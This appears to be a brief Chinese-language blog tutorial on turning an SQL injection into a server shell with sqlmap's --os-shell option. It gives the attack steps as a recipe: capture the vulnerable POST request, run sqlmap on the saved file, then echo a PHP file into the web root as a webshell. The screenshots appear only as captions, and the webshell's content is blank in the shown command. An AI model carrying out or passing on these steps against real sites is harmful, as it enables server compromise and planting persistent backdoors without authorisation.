sqlmap --os-shell(写入木马获取getshell)

 在存在sql注入处,可以使用--os-shell

对存在SQL注入处抓包,查看报错暴露出绝对路径

sqlmap --os-shell(写入木马获取getshell)_第1张图片

将POST包放入TXT文本中 

sqlmap --os-shell(写入木马获取getshell)_第2张图片

启动sqlmap 读取TXT文件

python sqlmap.py -r C:\Users\南倾\Desktop\222.txt --os-shell

sqlmap --os-shell(写入木马获取getshell)_第3张图片

 写入木马到文件中

echo "" > c:\appserv\www\phptest2\666.php

sqlmap --os-shell(写入木马获取getshell)_第4张图片

 成功

sqlmap --os-shell(写入木马获取getshell)_第5张图片

你可能感兴趣的:(渗透,安全,网络)